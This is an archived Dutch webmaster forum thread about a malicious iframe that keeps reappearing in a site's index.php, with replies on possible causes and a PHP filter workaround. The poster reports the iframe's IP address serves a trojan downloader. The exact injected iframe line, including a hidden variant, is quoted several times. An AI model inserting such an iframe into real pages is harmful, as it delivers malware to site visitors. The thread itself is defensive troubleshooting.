PDA

Bekijk Volledige Versie : Terugkerend virus in script



MartinM
12/06/07, 10:33
Hallo,

een kennis van mij zit met het volgende probleem:

Bij een script van hem krijgt hij sinds een paar dagen opeens een virus melding, op 1 server.

Het script draait op meerdere domeinnamen bij verschillende hosters en daar doet het probleem zich niet voor.

Hier zijn twee links bij van printscreens van de melding:

http://www.verzamelland.nl/virus.jpg

en

http://www.verzamelland.nl/virus1.jpg

Het ip adres wat in de afbeelding zichtbaar is: 81.95.149.28

Hij heeft dit ip adres nagekeken en schijnt een of andere Russische domein te zijn gehost in Panama, dat geeft ook niet veel duidelijkheid.

Deze regel op index.php is de veroorzaker van de virusmelding:

<iframe src='http://81.95.149.28/logo/index.php' width='900' height='900' ></iframe> Ga daar nou niet onbeschermd heen, zit een trojan downloader op

Deze regel werd al verwijderd van index.php, maar komt toch even later weer terug.

Hij heeft op google gezocht naar dit ip nummer en blijkt dus dat er meer mensen last hebben van dit probleem, alleen op Nederlandse gedeelte van google kwam het niet voor.

Zijn hoster is nu server aan het controleren, krijg hier morgenochtend een verslag van, zijn webmaster heeft nu het upload gedeelte van het script (advertenties plaatsen) uitgeschakeld en gaan we kijken of het morgen weer terug is de virus melding.

Na het verwijderen van de regel op index.php was het namelijk na een paar uur weer terug die virus waarschuwing.

Inmiddels heb ik zelf sinds gister dit script ook op een server van mij geinstalleerd en daar is het nog steeds schoon. Ik heb zelf dus het vermoeden dat er geen achterdeur in het script zit, maar hoe kan die Iframe dan steeds weer terugkomen bij mijn kennis.

Kan iemand hier zijn gedachten eens over laten gaan of dit meer lijkt op een probleem van een gehackte server van een hoster waar iemand gewoon hadnmatig in staat is om code toe te voegen aan bestaande scripts, of dat dit waarschijnlijk toch een "feature" ->| van het script is?

Alvast bedankt voor jullie bijdrages in deze.

Twan
12/06/07, 10:46
Hier kunnen heel veel dingen de oorzaak van zijn. Van een persistant cross-site scripting vulnerability tot direct toegang tot de server en alles daartussen. Aangezien de worm, het gaat hier namelijk om een worm, de host steeds opnieuw weet te infecteren lijkt het er erg op dat er bekende vulnerable software in het spel is. Weet je zeker dat alle 3rd party applicaties volledig up-to-date zijn? Anders is het misschien eens verstandig om een sniffer mee te laten draaien om de oorzaak te achterhalen.

Maar persoonlijk heb ik een sterk vermoeden dat het hier om een vulnerable 3rd party applicatie gaat, aangezien het hierdoor vele male makkelijker is voor een webbased worm zich te verspreiden.

MartinM
12/06/07, 11:15
Twan, bedankt voor je snelle reactie, maar even voor mijn beeldvorming, wanneer jij het over 3rd party hebt, bedoel jij in dit specifieke geval dan het script in kwestie, of overige software c.q. OS op de server waar dit script/deze site draait?

Aangezien dit script ook op andere servers draait waar ditzelfde probleem niet optreedt, wat mij weer doet denken aan een exploit die puur op deze server in kwestie aanwezig is.

Triloxigen
12/06/07, 11:18
Er zijn virussen die idd in html bestanden dergelijke code plaatsen. Maar dit kan dan dus op een werkstation zijn maar ook op de server.

Twan
12/06/07, 11:23
Twan, bedankt voor je snelle reactie, maar even voor mijn beeldvorming, wanneer jij het over 3rd party hebt, bedoel jij in dit specifieke geval dan het script in kwestie, of overige software c.q. OS op de server waar dit script/deze site draait?

Aangezien dit script ook op andere servers draait waar ditzelfde probleem niet optreedt, wat mij weer doet denken aan een exploit die puur op deze server in kwestie aanwezig is.

Het script in kwestie, gaat het hier om bekende software alsin: phpbb, phpnuke etc. etc. etc.?

Webbased wormen verspreiden zich meestal via google zoekopdrachten (googledorks), dit zou dus verklaren waarom jouw server niet geinfecteerd wordt als je de software installeerd. Deze zal waarschijnlijk niet zo snel geindexeerd worden.

MartinM
12/06/07, 11:32
Het script in kwestie, gaat het hier om bekende software alsin: phpbb, phpnuke etc. etc. etc.?


Het script in kwestie is een veilingscript, met een adbeheer en siteadmin er achter.

Ik wil je via PM wel een accountje geven, misschien dat jij het herkent als een modificatie op een bestaand script?

Dotdns
12/06/07, 11:36
we kregen dit vorig jaar ook te verduren,
Telkens we deze iframe eraf haalde, kwam het terug, de dag ernaa, kregen we meerdere klachten, van hosters dat dit tegenkwamen. het iframe kwam op allen HTML files terecht op de servers. ( niet enkel hosted files maar alle html )
Van alles geprobeerd, lukte niet.
Hebben we toen maar server opnieuw geinstalleerd.

Twan
12/06/07, 11:37
Nee hoor dat hoeft niet. Ik zou eerst de bevindingen van de sysadmin afwachten. Deze heeft veel meer middelen om de oorzaak te achterhalen. De oorzaak zou namelijk ook goed de server kunnen zijn. Wat misschien nog wel handig om te weten is: in welk bestand zet de worm deze i-frame?

Edit:
Als alle files worden 'geinfecteerd' lijkt het sterk op een vulnerability in OS of service, gezien de rechten die deze dat moet bezitten. De oorzaak zou dan misschien wat moeilijker te achterhalen zijn gezien je hier dan moet zoeken naar een shellcode. In dit geval moet je wel echt weten waar je naar moet zoeken en zelfs dan is het moeilijk (denk aan bijvoorbeeld polymorphism, alphanumeric shellcodes etc.). In dat geval is een complete reinstall van de server uit security-oogpunt de beste oplossing, gezien de mogelijkheid van eventueel geinstalleerde rootkits.

crazycoder
12/06/07, 12:03
In het verleden hebben we vaak genoeg gezien dat het op niet goed beveiligde servers mogelijk was om in de directories van anderen te schrijven.

Kortom, als de "buurman" op die server een script draait wat wordt misbruikt dan is het mogelijk dat via dat script bijv alle index.php of index.html bestanden aan worden gepast of worden overschreven.
Hier kan je zelf eigenlijk niet zo heel erg veel aan doen :( behalve de beheerder van de server vragen om er een blik op te werpen.. En ervoor te zorgen dat je eigen scripts wel veilig zijn natuurlijk :)

nielsrenselaar
12/06/07, 12:37
Mocht de oplossing nog even duren, is dit wellicht een tijdelijke oplossing (mits je zelf bij de programmatuur kan). Zorg eerst dat al je pagina output cached door middel van ob_start (http://www.php.net/ob_start). Dit plaats je helemaal boven aan de pagina, op regel no. 1.

Onder aan de pagina's plaats je:

$content = ob_get_contents();
$content = str_replace("<iframe src='http://81.95.149.28/logo/index.php' width='900' height='900' ></iframe>", "", $content);
echo $content;

Zo bescherm je in ieder geval je gebruikers totdat de oplossing is gevonden.

MartinM
12/06/07, 14:52
Dat is een mooie tip lijkt me, het eerste belang is natuurlijk ook bezoekers te beschermen. Verder zal ik mijn kennis toch op het hart drukken eens met zijn hoster te gaan praten en die duidelijk laten zoeken waar deze aanpassingen in de index.php vandaan komen, die zal dat in zijn logs toch terug moeten kunnen vinden.

Ik zal jullie op de hoogte houden van de ontwikkelingen, genoeg tips en advies lijkt me zo, dus : BEDANKT ALLEN!!


Mocht de oplossing nog even duren, is dit wellicht een tijdelijke oplossing (mits je zelf bij de programmatuur kan). Zorg eerst dat al je pagina output cached door middel van ob_start (http://www.php.net/ob_start). Dit plaats je helemaal boven aan de pagina, op regel no. 1.

Onder aan de pagina's plaats je:

$content = ob_get_contents();
$content = str_replace("<iframe src='http://81.95.149.28/logo/index.php' width='900' height='900' ></iframe>", "", $content);
echo $content;

Zo bescherm je in ieder geval je gebruikers totdat de oplossing is gevonden.

webchameleon
17/06/07, 09:53
Ik heb zelf het script ook draaien op meerdere domeinen, nu heb ik dit probleem ook gevonden (alleen 1 domein heeft er last van ) , echter staat er nu:

style='visibility: hidden;'></iframe> achter

Indien er een definitieve oplossing word gevonden, dan zal ik dit hier melden.

UPDATE **
De hoster heeft de server gescanned en diverse instellingen nagekeken, dit heeft geen resultaten opgeleverd.

(alles lijkt veilig te zijn)

Dus even alles in de gaten blijven houden

webchameleon
22/06/07, 01:36
UPDATE**
Dat Iframe gebeuren was een zgn ftp hack .
Degene die mijn script heeft uitgebreid had dus op een externe pc even gewerkt, deze was besmet, en zodoende kon deze (vermoedelijk) de ftp inlog gegevens misbruiken.

Evt iets om even na te gaan..

Ik heb sinds ik de ftp/phpadmin/beheer inlog heb gewijzigd geen last meer gehad.



EDIT** Ik heb nu een progamma dat bestanden scanned op Iframes, dit scheelt overigens veel zoekwerk. :)

Deze scanned dus niet op de server (ivm rechten etcetc), maar je download je bestanden naar je hd en je laat het progje z'n werk doen, zodoende vond ik toch nog een iframe bestand met dat irritante ip adres.

Dus dank bijdeze mijn scripter :) die zijn werk uiterst serieus neemt. (zelf dit progamma'tje gemaakt)